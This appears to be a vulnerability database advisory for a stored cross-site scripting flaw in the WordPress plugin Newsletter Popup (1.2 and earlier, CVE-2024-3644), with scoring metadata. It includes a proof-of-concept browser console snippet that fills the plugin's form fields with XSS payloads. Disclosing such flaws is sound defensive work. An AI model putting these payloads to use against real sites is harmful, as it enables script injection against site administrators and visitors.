Lucene search
Bob MatyasWPEX-ID:10EB712A-D9C3-46C9-BE6A-02811396FAE8HistoryApr 25, 2024 - 12:00 a.m.
Newsletter Popup <= 1.2 - Admin+ Stored XSS
2024-04-2500:00:00
Bob Matyas
14
stored xss
newsletter popup
admin
security update
exploit
Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)
1. Go to "Newsletter Popup > Add New"
2. In the browser console, enter:
```
let inputs = document.querySelectorAll( '#wpbody-content input[type="text"]' ); inputs.forEach( (element) => element.value=`" style=animation-name:rotation onanimationstart=alert(/XSS: ${element.name}/)//` );let textareas = document.querySelectorAll( '#wpbody-content textarea' ); textareas.forEach( (element) => element.value=`</textarea><script>alert(/XSS: ${element.name}/)</script>` );
```
3. Click "Save Changes"
4. Go to "Manage Newsletters" and edit the newsletter that you added
5. See multiple XSS examplesRelated
wpvulndb
wpvulndb
Newsletter Popup <= 1.2 - Admin+ Stored XSS
2024-04-25 00:00:00
cve
cve
CVE-2024-3644
2024-05-16 06:15:10
cvelist
cvelist
CVE-2024-3644 Newsletter Popup <= 1.2 - Admin+ Stored XSS
2024-05-16 06:00:03
5.7 Medium
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
8.7%
Related for WPEX-ID:10EB712A-D9C3-46C9-BE6A-02811396FAE8